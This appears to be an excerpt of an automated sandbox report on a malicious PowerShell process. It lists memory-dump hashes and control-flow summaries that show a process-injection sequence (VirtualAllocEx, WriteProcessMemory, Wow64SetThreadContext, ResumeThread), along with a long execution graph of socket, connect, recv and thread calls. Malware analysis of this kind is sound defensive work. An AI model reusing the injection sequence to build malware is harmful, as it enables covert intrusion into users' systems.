                                                                                                                                                                                                  • Source File: 0000000C.00000002.442822729.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_230000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                  • Opcode ID: 22ca82fe3871057040e9b8da907f39357cfee52743c6220edfec3fceb0e6e738
                                                                                                                                                                                                  • Instruction ID: 7ac50a2211e266e418c5808b0c127ad09cf03626bc90a21d953ac7fc1503f837
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22ca82fe3871057040e9b8da907f39357cfee52743c6220edfec3fceb0e6e738
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE21E8B59102499FDB10CFA9D884BEEBBF4FF48350F108429E458A7250D3789A54CF65

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
Control-flow graph (node/edge list; the drawn graph is not recoverable): function 237ce0-237d93, 5 basic blocks, a second entry into the same WriteProcessMemory routine as the function at 237cde above; the block 237d30-237d69 calls WriteProcessMemory.
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00237D5C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442822729.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_230000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                  • Opcode ID: 8366b1d92f54040f9022941ef44aaf0fa92c672628e0bcf032ab4da94741451c
                                                                                                                                                                                                  • Instruction ID: a442d6fc2e725c74924d47010805cb0ac8f6decf039298b214d93d7d125ac04a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8366b1d92f54040f9022941ef44aaf0fa92c672628e0bcf032ab4da94741451c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B121E5B19102499FDB10CF9AD884BDEBBF4FF48310F50842AE558A7250D378A954CFA5

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
Control-flow graph (node/edge list; the drawn graph is not recoverable): function 237b60-237c0a, 5 basic blocks; the block 237bb4-237be0 calls Wow64SetThreadContext, with the failure path at 237be2-237be8 rejoining at 237be9.
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00237BD3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442822729.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_230000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                                  • Opcode ID: 377e3d79bb1b10135b1b9ecab564f1dd37f7a5971060f70b93862f563d27683c
                                                                                                                                                                                                  • Instruction ID: e9bdd4f505bb9a6b1e740c16d6d236f9f58d20b75a88bfe2c15d10f93f62ce04
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 377e3d79bb1b10135b1b9ecab564f1dd37f7a5971060f70b93862f563d27683c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 491144B1D106498FDB20CFAAC884BDEFBF5AF89324F14806AD458A3640D3389545CFA1

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
Control-flow graph (node/edge list; the drawn graph is not recoverable): function 237b68-237c0a, 5 basic blocks, a second entry into the same Wow64SetThreadContext routine as the function at 237b60 above; the block 237bb4-237be0 calls Wow64SetThreadContext.
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00237BD3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442822729.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_230000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                                  • Opcode ID: 4672e9654d1dc2fa2a05aea77a48675f3d11a1f1a4ed8bf851ef9b1eda952670
                                                                                                                                                                                                  • Instruction ID: c101eb7a858ace872c5db7d2c9b4cc088abaadae27660f0660f9ba2bf7ca8f4e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4672e9654d1dc2fa2a05aea77a48675f3d11a1f1a4ed8bf851ef9b1eda952670
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 981116B1D102498FDB20CF9AC884BDEFBF5EB89324F15842AD458A3740D378A545CFA1

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
Control-flow graph (node/edge list; the drawn graph is not recoverable): entry 236ef8, 44 listed basic blocks spanning 236871-2373f0; the entry block 236ef8-236f08 calls 231824, the block 236e48-236e86 calls ResumeThread, the block 2368f6-2370f4 calls VirtualAllocEx, the block 23732c-237336 calls 235254 and the block 236af7-236b17 calls 23180c. Most blocks fall through to the dispatch block at 2368ed-2368f0, which selects between the VirtualAllocEx path and the 2371f0 path.
APIs
Memory Dump Source
• Source File: 0000000C.00000002.442822729.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_230000_powershell.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 89cd32c06af6f5bafb83ef8ebdf2cefb8643bc6d80f63e73d1dbbd5dbf459586
• Instruction ID: abacce9ccf4f2de4e344f3710d1e13f4cf25123d04c3e27c5e596bc9bf3bf7d6
• Opcode Fuzzy Hash: 89cd32c06af6f5bafb83ef8ebdf2cefb8643bc6d80f63e73d1dbbd5dbf459586
• Instruction Fuzzy Hash: 89118CB4924215DFEB20DF54C98CB9977BABB04318F2082D5D1096B291C3749DADDF11

Control-flow Graph
APIs
Memory Dump Source
• Source File: 0000000C.00000002.442822729.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_230000_powershell.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 4d689c0c5cff88775235aaf4bdb050722d0de6f7141d448dee42b11571dc0f68
• Instruction ID: d1b7e2c1020458f0fc067d1a4eda987f2eb934c731b9ced534d3c328e1a2b0d0
• Opcode Fuzzy Hash: 4d689c0c5cff88775235aaf4bdb050722d0de6f7141d448dee42b11571dc0f68
• Instruction Fuzzy Hash: 5D01AFB4924218DFEB308F94C88C799BBBABB05318F2085CAD1196B291C3748DDDDF12

Control-flow Graph
Memory Dump Source
• Source File: 0000000C.00000002.442853576.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_320000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 767f84b1b59511d743f806106663746a29effe9503b6208929a1c7d51a72d0a8
• Instruction ID: 01ed9a2cc93a6cd6d73607349b222d500cc1d4a65bac3c301cebf838ad4a3263
• Opcode Fuzzy Hash: 767f84b1b59511d743f806106663746a29effe9503b6208929a1c7d51a72d0a8
• Instruction Fuzzy Hash: 524117306093E1AFC7138B64896066ABFB1AF47300B1AC1DBD594DF293C7759D45C762
Memory Dump Source
• Source File: 0000000C.00000002.442785802.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1ad000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c487f4553d814cfa6270d3ecbf4866ee5baeaf2dd6b7d34adc7393c85f1ae0d
• Instruction ID: 3723abda55f9afa45916e368ece700cfd02cc2ff6b339d48a356a67c906ef66f
• Opcode Fuzzy Hash: 3c487f4553d814cfa6270d3ecbf4866ee5baeaf2dd6b7d34adc7393c85f1ae0d
• Instruction Fuzzy Hash: 06018C6100D3C09FD7134B259D94752BFA8EF53624F1984CBE8858F5A3C2685C49CB72
Memory Dump Source
• Source File: 0000000C.00000002.442785802.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1ad000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fc9ff2dcab8ea97c815c339b6faebbdb89e45d65891b5f9d3be1a586d5b09531
• Instruction ID: f43c5a5dcb9f11fa5ac38ef0bf711b49c7372b1a0f9cc11d945b27dd223d1dd1
• Opcode Fuzzy Hash: fc9ff2dcab8ea97c815c339b6faebbdb89e45d65891b5f9d3be1a586d5b09531
• Instruction Fuzzy Hash: A201F775104B40AEE7105E25EDC4B67BF98DF82724F18C019FC460B582C3799945CAB1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.442853576.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_320000_powershell.jbxd
Similarity
• API ID:
• String ID: (:+$(:+$(:+$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:+$L:+$L:+$p:+
• API String ID: 0-3856856977
• Opcode ID: b9db034b8cb4dd06f350ee8935106d83e671d7f45f97eea00de09f117590f942
• Instruction ID: a6dd96f5e5a2d4029af9c23e0c43d98e59cae434cf6e12dbdbcdb9349a6baf16
• Opcode Fuzzy Hash: b9db034b8cb4dd06f350ee8935106d83e671d7f45f97eea00de09f117590f942
• Instruction Fuzzy Hash: 51E12531700225DFDF1A9B64E8507BEBBA6AFC1310F258066E9459B2D3CB70DD49CB92
Strings
Memory Dump Source
• Source File: 0000000C.00000002.442853576.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_320000_powershell.jbxd
Similarity
• API ID:
• String ID: $;+$H;+$H;+$H;+$L4#p$L4#p$L4#p
• API String ID: 0-1584371872
• Opcode ID: 4017ee916891c75e67ae05097ea10019abe23f7bd19a37abe4ce0016b5afaaee
• Instruction ID: 4fa36a277a5aaa64d50c070a4e65b42f20a5d2c39643fc43ab39acd81eab2b38
• Opcode Fuzzy Hash: 4017ee916891c75e67ae05097ea10019abe23f7bd19a37abe4ce0016b5afaaee
• Instruction Fuzzy Hash: 9A815A317043649FDB1A9B68D8107AEBBB2EFC1300F15806AE4919B293DB70ED55CB92
Strings
Memory Dump Source
• Source File: 0000000C.00000002.442853576.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_320000_powershell.jbxd
Similarity
• API ID:
• String ID: L4#p$L4#p$L4#p$L:+$L:+
• API String ID: 0-4109606411
• Opcode ID: 1c11ca671242f090d9591950a6c42ea3ae2132496e1d082c1d423016ae35f05d
• Instruction ID: 8ea3d31d14a877c688764b19b71f240c50dede66e7aa49936ed55a47237132a5
• Opcode Fuzzy Hash: 1c11ca671242f090d9591950a6c42ea3ae2132496e1d082c1d423016ae35f05d
• Instruction Fuzzy Hash: A841D335600228EFDF2ADF55E440BBE77A6AF80310F19C065EA459B2D2C7B0DD89CB51

Execution Graph

Execution Coverage: 5.9%
Dynamic/Decrypted Code Coverage: 19.7%
Signature Coverage: 4%
Total number of Nodes: 1510
Total number of Limit Nodes: 46
53289->53284 53291 100054a7 __fassign 36 API calls 53290->53291 53292 10008a51 53291->53292 53296 10008821 53292->53296 53295->53281 53298 1000883c 53296->53298 53297 10008862 MultiByteToWideChar 53299 10008a16 53297->53299 53300 1000888c 53297->53300 53298->53297 53301 10002ada _ValidateLocalCookies 5 API calls 53299->53301 53305 100056d0 20 API calls 53300->53305 53307 100088ad 53300->53307 53302 10006b87 53301->53302 53302->53267 53303 100088f6 MultiByteToWideChar 53304 10008962 53303->53304 53306 1000890f 53303->53306 53332 10008801 19 API calls _free 53304->53332 53305->53307 53323 10005f19 53306->53323 53307->53303 53307->53304 53311 10008971 53313 100056d0 20 API calls 53311->53313 53317 10008992 53311->53317 53312 10008939 53312->53304 53315 10005f19 10 API calls 53312->53315 53313->53317 53314 10008a07 53331 10008801 19 API calls _free 53314->53331 53315->53304 53317->53314 53318 10005f19 10 API calls 53317->53318 53319 100089e6 53318->53319 53319->53314 53320 100089f5 WideCharToMultiByte 53319->53320 53320->53314 53321 10008a35 53320->53321 53333 10008801 19 API calls _free 53321->53333 53334 10005c45 53323->53334 53325 10005f40 53326 10005f49 53325->53326 53338 10005fa1 9 API calls 2 library calls 53325->53338 53329 10002ada _ValidateLocalCookies 5 API calls 53326->53329 53328 10005f89 LCMapStringW 53328->53326 53330 10005f9b 53329->53330 53330->53304 53330->53311 53330->53312 53331->53304 53332->53299 53333->53304 53336 10005c71 53334->53336 53337 10005c75 __crt_fast_encode_pointer 53334->53337 53336->53337 53339 10005ce1 53336->53339 53337->53325 53338->53328 53340 10005d02 LoadLibraryExW 53339->53340 53343 10005cf7 53339->53343 53341 10005d37 53340->53341 53342 10005d1f GetLastError 53340->53342 53341->53343 53345 10005d4e FreeLibrary 53341->53345 53342->53341 53344 10005d2a LoadLibraryExW 53342->53344 53343->53336 53344->53341 53345->53343 53346->53275 53347 434906 53352 434bd8 SetUnhandledExceptionFilter 53347->53352 53349 43490b 
pre_c_initialization 53353 4455cc 20 API calls 2 library calls 53349->53353 53351 434916 53352->53349 53353->53351 53354 1000c7a7 53355 1000c7be 53354->53355 53360 1000c82c 53354->53360 53355->53360 53364 1000c7e6 GetModuleHandleA 53355->53364 53356 1000c872 53357 1000c835 GetModuleHandleA 53359 1000c83f 53357->53359 53359->53359 53359->53360 53360->53356 53360->53357 53365 1000c7ef 53364->53365 53372 1000c82c 53364->53372 53374 1000c803 53365->53374 53367 1000c872 53368 1000c835 GetModuleHandleA 53370 1000c83f 53368->53370 53370->53370 53370->53372 53372->53367 53372->53368 53375 1000c809 53374->53375 53376 1000c82c 53375->53376 53377 1000c80d VirtualProtect 53375->53377 53379 1000c872 53376->53379 53380 1000c835 GetModuleHandleA 53376->53380 53377->53376 53378 1000c81c VirtualProtect 53377->53378 53378->53376 53381 1000c83f 53380->53381 53381->53376 53382 43bea8 53385 43beb4 _swprintf ___FrameUnwindToState 53382->53385 53383 43bec2 53398 44062d 20 API calls _abort 53383->53398 53385->53383 53387 43beec 53385->53387 53386 43bec7 pre_c_initialization ___FrameUnwindToState 53393 445909 EnterCriticalSection 53387->53393 53389 43bef7 53394 43bf98 53389->53394 53393->53389 53396 43bfa6 53394->53396 53395 43bf02 53399 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53395->53399 53396->53395 53400 4497ec 37 API calls 2 library calls 53396->53400 53398->53386 53399->53386 53400->53396 53401 4458c8 53402 4458d3 53401->53402 53404 4458fc 53402->53404 53405 4458f8 53402->53405 53407 448b04 53402->53407 53414 445920 DeleteCriticalSection 53404->53414 53415 44854a 53407->53415 53410 448b49 InitializeCriticalSectionAndSpinCount 53411 448b34 53410->53411 53422 43502b 53411->53422 53413 448b60 53413->53402 53414->53405 53416 448576 53415->53416 53417 44857a 53415->53417 53416->53417 53419 44859a 53416->53419 53429 4485e6 53416->53429 53417->53410 53417->53411 53419->53417 53420 4485a6 GetProcAddress 53419->53420 53421 4485b6 __crt_fast_encode_pointer 53420->53421 53421->53417 
53423 435036 IsProcessorFeaturePresent 53422->53423 53424 435034 53422->53424 53426 435078 53423->53426 53424->53413 53436 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53426->53436 53428 43515b 53428->53413 53430 448607 LoadLibraryExW 53429->53430 53435 4485fc 53429->53435 53431 448624 GetLastError 53430->53431 53432 44863c 53430->53432 53431->53432 53433 44862f LoadLibraryExW 53431->53433 53434 448653 FreeLibrary 53432->53434 53432->53435 53433->53432 53434->53435 53435->53416 53436->53428 53437 41e04e 53438 41e063 ctype ___scrt_get_show_window_mode 53437->53438 53439 41e266 53438->53439 53440 432f55 21 API calls 53438->53440 53445 41e21a 53439->53445 53451 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 53439->53451 53444 41e213 ___scrt_get_show_window_mode 53440->53444 53442 41e277 53442->53445 53452 432f55 53442->53452 53444->53445 53446 432f55 21 API calls 53444->53446 53449 41e240 ___scrt_get_show_window_mode 53446->53449 53447 41e2b0 ___scrt_get_show_window_mode 53447->53445 53457 4335db 53447->53457 53449->53445 53450 432f55 21 API calls 53449->53450 53450->53439 53451->53442 53453 432f63 53452->53453 53454 432f5f 53452->53454 53455 43bda0 new 21 API calls 53453->53455 53454->53447 53456 432f68 53455->53456 53456->53447 53460 4334fa 53457->53460 53459 4335e3 53459->53445 53461 433513 53460->53461 53465 433509 53460->53465 53462 432f55 21 API calls 53461->53462 53461->53465 53463 433534 53462->53463 53463->53465 53466 4338c8 CryptAcquireContextA 53463->53466 53465->53459 53467 4338e9 CryptGenRandom 53466->53467 53468 4338e4 53466->53468 53467->53468 53469 4338fe CryptReleaseContext 53467->53469 53468->53465 53469->53468 53470 426c6d 53476 426d42 recv 53470->53476 53477 426a77 53478 426a8c 53477->53478 53482 426b1e 53477->53482 53479 426bd5 53478->53479 53480 426ad9 53478->53480 53481 426b4e 53478->53481 53478->53482 53483 426bae 53478->53483 53486 426b83 
53478->53486 53490 426b0e 53478->53490 53505 424f6e 49 API calls ctype 53478->53505 53479->53482 53510 4261e6 28 API calls 53479->53510 53480->53482 53480->53490 53506 41fbfd 52 API calls 53480->53506 53481->53482 53481->53486 53508 41fbfd 52 API calls 53481->53508 53483->53479 53483->53482 53493 425b72 53483->53493 53486->53483 53509 425781 21 API calls 53486->53509 53490->53481 53490->53482 53507 424f6e 49 API calls ctype 53490->53507 53496 425b91 ___scrt_get_show_window_mode 53493->53496 53494 425ba0 53495 425bc5 53494->53495 53497 425ba5 53494->53497 53512 420669 46 API calls 53494->53512 53495->53479 53496->53494 53496->53495 53511 41ec4c 21 API calls 53496->53511 53497->53495 53501 425bae 53497->53501 53513 41daf0 49 API calls 53497->53513 53501->53495 53514 424d96 21 API calls 2 library calls 53501->53514 53503 425c48 53503->53495 53504 432f55 21 API calls 53503->53504 53504->53497 53505->53480 53506->53480 53507->53481 53508->53481 53509->53483 53510->53482 53511->53494 53512->53503 53513->53501 53514->53495 53515 4165db 53526 401e65 53515->53526 53517 4165eb 53518 4020f6 28 API calls 53517->53518 53519 4165f6 53518->53519 53520 401e65 22 API calls 53519->53520 53521 416601 53520->53521 53522 4020f6 28 API calls 53521->53522 53523 41660c 53522->53523 53531 412965 53523->53531 53527 401e6d 53526->53527 53528 401e75 53527->53528 53550 402158 22 API calls 53527->53550 53528->53517 53551 40482d 53531->53551 53533 412979 53558 4048c8 connect 53533->53558 53537 41299a 53623 402f10 53537->53623 53540 404aa1 61 API calls 53541 4129ae 53540->53541 53542 401fd8 11 API calls 53541->53542 53543 4129b6 53542->53543 53628 404c10 53543->53628 53546 401fd8 11 API calls 53547 4129cc 53546->53547 53548 401fd8 11 API calls 53547->53548 53549 4129d4 53548->53549 53552 404846 socket 53551->53552 53553 404839 53551->53553 53555 404860 CreateEventW 53552->53555 53556 404842 53552->53556 53646 40489e WSAStartup 53553->53646 53555->53533 53556->53533 53557 40483e 53557->53552 
53557->53556 53559 404a1b 53558->53559 53560 4048ee 53558->53560 53561 40497e 53559->53561 53562 404a21 WSAGetLastError 53559->53562 53560->53561 53585 404923 53560->53585 53647 40531e 53560->53647 53618 402f31 53561->53618 53562->53561 53563 404a31 53562->53563 53566 404a36 53563->53566 53571 404932 53563->53571 53687 41cb72 30 API calls 53566->53687 53567 40492b 53570 404941 53567->53570 53567->53571 53568 40490f 53652 402093 53568->53652 53582 404950 53570->53582 53583 404987 53570->53583 53572 402093 28 API calls 53571->53572 53575 404a80 53572->53575 53574 404a40 53688 4052fd 28 API calls 53574->53688 53579 402093 28 API calls 53575->53579 53584 404a8f 53579->53584 53588 402093 28 API calls 53582->53588 53684 421ad1 54 API calls 53583->53684 53589 41b580 80 API calls 53584->53589 53682 420cf1 27 API calls 53585->53682 53592 40495f 53588->53592 53589->53561 53591 40498f 53594 4049c4 53591->53594 53595 404994 53591->53595 53596 402093 28 API calls 53592->53596 53686 420e97 28 API calls 53594->53686 53598 402093 28 API calls 53595->53598 53599 40496e 53596->53599 53601 4049a3 53598->53601 53602 41b580 80 API calls 53599->53602 53605 402093 28 API calls 53601->53605 53606 404973 53602->53606 53603 4049cc 53604 4049f9 CreateEventW CreateEventW 53603->53604 53607 402093 28 API calls 53603->53607 53604->53561 53608 4049b2 53605->53608 53683 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53606->53683 53609 4049e2 53607->53609 53610 41b580 80 API calls 53608->53610 53612 402093 28 API calls 53609->53612 53613 4049b7 53610->53613 53614 4049f1 53612->53614 53685 421143 52 API calls 53613->53685 53616 41b580 80 API calls 53614->53616 53617 4049f6 53616->53617 53617->53604 53619 4020df 11 API calls 53618->53619 53620 402f3d 53619->53620 53621 4032a0 28 API calls 53620->53621 53622 402f59 53621->53622 53622->53537 53739 401fb0 53623->53739 53625 402f1e 53626 402055 11 API calls 53625->53626 53627 402f2d 53626->53627 53627->53540 53629 4020df 11 API 
calls 53628->53629 53630 404c27 53629->53630 53631 4020df 11 API calls 53630->53631 53641 404c30 53631->53641 53632 43bda0 new 21 API calls 53632->53641 53634 4020b7 28 API calls 53634->53641 53635 404ca1 53769 404e26 99 API calls 53635->53769 53638 404ca8 53640 401fd8 11 API calls 53638->53640 53639 401fd8 11 API calls 53639->53641 53642 404cb1 53640->53642 53641->53632 53641->53634 53641->53635 53641->53639 53742 404b96 53641->53742 53748 401fe2 53641->53748 53757 404cc3 53641->53757 53643 401fd8 11 API calls 53642->53643 53644 404cba 53643->53644 53644->53546 53646->53557 53648 4020df 11 API calls 53647->53648 53649 40532a 53648->53649 53689 4032a0 53649->53689 53651 405346 53651->53568 53653 40209b 53652->53653 53654 4023ce 11 API calls 53653->53654 53655 4020a6 53654->53655 53693 4024ed 53655->53693 53658 41b580 53659 41b631 53658->53659 53660 41b596 GetLocalTime 53658->53660 53661 401fd8 11 API calls 53659->53661 53662 40531e 28 API calls 53660->53662 53663 41b639 53661->53663 53664 41b5d8 53662->53664 53665 401fd8 11 API calls 53663->53665 53697 406383 53664->53697 53667 41b641 53665->53667 53667->53585 53669 402f10 28 API calls 53670 41b5f0 53669->53670 53671 406383 28 API calls 53670->53671 53672 41b5fc 53671->53672 53702 40723b 77 API calls 53672->53702 53674 41b60a 53675 401fd8 11 API calls 53674->53675 53676 41b616 53675->53676 53677 401fd8 11 API calls 53676->53677 53678 41b61f 53677->53678 53679 401fd8 11 API calls 53678->53679 53680 41b628 53679->53680 53681 401fd8 11 API calls 53680->53681 53681->53659 53682->53567 53683->53561 53684->53591 53685->53606 53686->53603 53687->53574 53691 4032aa 53689->53691 53690 4032c9 53690->53651 53691->53690 53692 4028e8 28 API calls 53691->53692 53692->53690 53694 4024f9 53693->53694 53695 40250a 28 API calls 53694->53695 53696 4020b1 53695->53696 53696->53658 53703 4051ef 53697->53703 53699 406391 53707 402055 53699->53707 53702->53674 53704 4051fb 53703->53704 53713 405274 53704->53713 53706 405208 53706->53699 
53708 402061 53707->53708 53709 4023ce 11 API calls 53708->53709 53710 40207b 53709->53710 53735 40267a 53710->53735 53714 405282 53713->53714 53715 405288 53714->53715 53716 40529e 53714->53716 53724 4025f0 53715->53724 53718 4052f5 53716->53718 53719 4052b6 53716->53719 53733 4028a4 22 API calls 53718->53733 53722 4028e8 28 API calls 53719->53722 53723 40529c 53719->53723 53722->53723 53723->53706 53725 402888 22 API calls 53724->53725 53726 402602 53725->53726 53727 402672 53726->53727 53728 402629 53726->53728 53734 4028a4 22 API calls 53727->53734 53730 4028e8 28 API calls 53728->53730 53732 40263b 53728->53732 53730->53732 53732->53723 53736 40268b 53735->53736 53737 4023ce 11 API calls 53736->53737 53738 40208d 53737->53738 53738->53669 53740 4025f0 28 API calls 53739->53740 53741 401fbd 53740->53741 53741->53625 53743 404ba0 WaitForSingleObject 53742->53743 53744 404bcd recv 53742->53744 53770 421107 54 API calls 53743->53770 53746 404be0 53744->53746 53746->53641 53747 404bbc SetEvent 53747->53746 53749 401ff1 53748->53749 53756 402039 53748->53756 53750 4023ce 11 API calls 53749->53750 53751 401ffa 53750->53751 53752 402015 53751->53752 53753 40203c 53751->53753 53771 403098 28 API calls 53752->53771 53754 40267a 11 API calls 53753->53754 53754->53756 53756->53641 53758 4020df 11 API calls 53757->53758 53768 404cde 53758->53768 53759 404e13 53760 401fd8 11 API calls 53759->53760 53761 404e1c 53760->53761 53761->53641 53762 4041a2 28 API calls 53762->53768 53763 401fe2 28 API calls 53763->53768 53764 401fd8 11 API calls 53764->53768 53766 4020f6 28 API calls 53766->53768 53768->53759 53768->53762 53768->53763 53768->53764 53768->53766 53772 401fc0 53768->53772 53769->53638 53770->53747 53771->53756 53773 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53772->53773 53774 401fc9 53772->53774 53773->53768 53777 415b25 53773->53777 53776 4025e0 28 API calls 53774->53776 53776->53773 53778 4020f6 28 API calls 53777->53778 53779 415b47 SetEvent 
53778->53779 53780 415b5c 53779->53780 53856 4041a2 53780->53856 53783 4020f6 28 API calls 53784 415b86 53783->53784 53785 4020f6 28 API calls 53784->53785 53786 415b98 53785->53786 53859 41beac 53786->53859 53789 415d11 53791 401e8d 11 API calls 53789->53791 53790 415bc1 GetTickCount 53881 41bc1f 53790->53881 53794 4170cd 53791->53794 53793 415d34 53922 4050e4 84 API calls 53793->53922 53797 401fd8 11 API calls 53794->53797 53800 4170d9 53797->53800 53799 415d04 53799->53789 53802 401fd8 11 API calls 53800->53802 53801 415bde 53804 41bc1f 28 API calls 53801->53804 53803 4170e5 53802->53803 53805 415be9 53804->53805 53887 41bb27 53805->53887 53810 401e65 22 API calls 53811 415c13 53810->53811 53812 402f31 28 API calls 53811->53812 53813 415c21 53812->53813 53896 402ea1 28 API calls 53813->53896 53815 415c30 53816 402f10 28 API calls 53815->53816 53817 415c3f 53816->53817 53897 402ea1 28 API calls 53817->53897 53819 415c4e 53820 402f10 28 API calls 53819->53820 53821 415c5a 53820->53821 53898 402ea1 28 API calls 53821->53898 53823 415c64 53824 404aa1 61 API calls 53823->53824 53825 415c73 53824->53825 53826 401fd8 11 API calls 53825->53826 53827 415c7c 53826->53827 53828 401fd8 11 API calls 53827->53828 53829 415c88 53828->53829 53830 401fd8 11 API calls 53829->53830 53831 415c94 53830->53831 53832 401fd8 11 API calls 53831->53832 53833 415ca0 53832->53833 53834 401fd8 11 API calls 53833->53834 53835 415cac 53834->53835 53836 401fd8 11 API calls 53835->53836 53837 415cb8 53836->53837 53899 401f09 53837->53899 53840 401fd8 11 API calls 53841 415cca 53840->53841 53842 401fd8 11 API calls 53841->53842 53843 415cd3 53842->53843 53844 401e65 22 API calls 53843->53844 53845 415cde 53844->53845 53902 43bb2c 53845->53902 53848 415cf0 53852 415d09 53848->53852 53853 415cfe 53848->53853 53849 415d16 53850 401e65 22 API calls 53849->53850 53851 415d20 53850->53851 53851->53789 53851->53793 53907 404f51 53852->53907 53906 404ff4 82 API calls 53853->53906 53923 40423a 
